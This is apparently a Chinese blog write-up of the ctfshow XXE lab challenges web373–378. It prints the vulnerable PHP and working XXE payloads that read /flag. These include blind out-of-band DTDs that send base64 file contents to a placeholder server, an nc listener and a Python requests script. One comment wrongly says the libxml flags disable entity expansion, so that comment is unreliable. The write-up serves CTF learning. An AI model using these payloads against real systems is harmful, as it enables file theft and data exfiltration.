ctfshow web入门 XXE漏洞

web373

<?php
error_reporting(0);
libxml_disable_entity_loader(false);//启用外部实体加载器
$xmlfile = file_get_contents('php://input');//输入流等会payload我们用POST传参
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    使用 loadXML 方法加载 XML 数据到 DOM 文档对象 $dom 中。加载过程中使用了 LIBXML_NOENTLIBXML_DTDLOAD 参数,这些参数用于禁止实体扩展和加载外部的 DTD 文件,以提高安全性。
    $creds = simplexml_import_dom($dom);//将对象转为SimpleXMLElement 对象
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__); 
<!DOCTYPE test [  
<!ENTITY xxe SYSTEM "file:///flag">    
]>
<baozongwi>   
	<ctfshow>
		&xxe;
	</ctfshow>  
</baozongwi>

web374–web376

<?php
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);  
这里比上题少两句没有转化为SimpleXMLElement 对象所以也没有赋值

test.dtd:

<!ENTITY % dtd "<!ENTITY &#x25;xxe SYSTEM 'http://xxx:9999/%file;'> ">
%dtd;
%xxe;
<!DOCTYPE test[
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % aaa SYSTEM "http://xxx(你的服务器)/test.dtd">
%aaa;
]>
<root>
	123
</root>

test:dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://xxx:9999/?x=%file;'>">
%eval;
%exfiltrate;
<?xml  version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://xxx/test.dtd">%xxe;]>
<root><ctfshow>&xxe;</ctfshow></root>

服务器开始监听

nc -lvp 9999

web377

import requests

# 目标URL
url = 'https://9afc298f-29cf-44ab-b8a4-7f6d66f67905.challenge.ctf.show/'

# XML实体注入的payload,已转换为UTF-16编码
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxxx/test.dtd">
%aaa;
]>
<root>123</root>""".encode('utf-16')

# 发送POST请求,注意:verify=False关闭了SSL验证,仅在测试环境下使用!
response = requests.post(url, data=payload, verify=False)


test.dtd:

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://xxxx:9999/?x=%file;'>">
%eval;
%exfiltrate;
nc -lvp 9999    //服务器监听

web378

在这里插入图片描述
登录成功但是没有回显,抓包

function doLogin(){
	var username = $("#username").val();
	var password = $("#password").val();
	if(username == "" || password == ""){
		alert("Please enter the username and password!");
		return;
	}
	
	var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 
    $.ajax({
        type: "POST",
        url: "doLogin",
        contentType: "application/xml;charset=utf-8",
        data: data,
        dataType: "xml",
        anysc: false,
        success: function (result) {
        	var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;
        	var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;
        	if(code == "0"){
        		$(".msg").text(msg + " login fail!");
        	}else if(code == "1"){
        		$(".msg").text(msg + " login success!");
        	}else{
        		$(".msg").text("error:" + msg);
        	}
        },
        error: function (XMLHttpRequest,textStatus,errorThrown) {
            $(".msg").text(errorThrown + ':' + textStatus);
        }
    }); 
}

抓包发现码,改包

type: "POST",
        url: "doLogin",
        contentType: "application/xml;charset=utf-8",

POST传参:
<!DOCTYPE test[
<!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe;
</username>
<password>
&xxe;
</password>
</user>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值